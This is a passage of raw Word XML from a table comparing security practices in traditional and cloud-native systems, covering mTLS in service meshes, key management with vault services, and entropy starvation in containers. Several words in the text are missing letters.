              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>every hop (Service A to Service</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>B) via a Service Mesh (e.g.,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Isto</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>utlizing</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>mutual</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> TLS</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>mTLS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>to prevent lateral</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>snifng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="2E65367B" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C9E6974" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Key</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Management</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Practces</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44405FEE" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Cryptographic keys are frequently found</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">hardcoded </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>web.config</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>application.properties</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>fles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, or</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">saved on the local </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>fle</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> system. Perimeter</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>security (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>frewalls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>) is relied upon to protect</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>these keys.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74AD10AA" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Highly dynamic. Storing keys</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>locally is impossible due to the</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>ephemeral nature of</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>containers. Environments rely</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>on centralized systems like</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>AWS KMS, Azure Key Vault, or</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>HashiCorp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> Vault</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>drastcally</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>reducing hardcoding risks but</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>creatng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> a single point of</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>structural failure if IAM policies</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">are </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>misconfgured</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="537EFE8A" w14:textId="77777777" w:rsidTr="00B064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E7D5BC" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Randomness &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Entropy</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Sources</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FF9153" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Traditonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> physical servers have access to a</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>rich pool of hardware-based entropy (disk</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>I/O, keyboard interrupts, network mouse</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>movements) to fuel</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>/dev/random</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7276D2B9" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Ephemeral containers and</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">serverless </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>functons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> (like AWS</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Lambda) lack </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>traditonal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>hardware interrupts. In large</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">clusters, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>multple</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> parallel</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>containers spinning up</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">simultaneously can </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>sufer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> from</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">entropy </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>starvaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>, leading to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">predictable seed </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>generaton</w:t>
            </w:r>
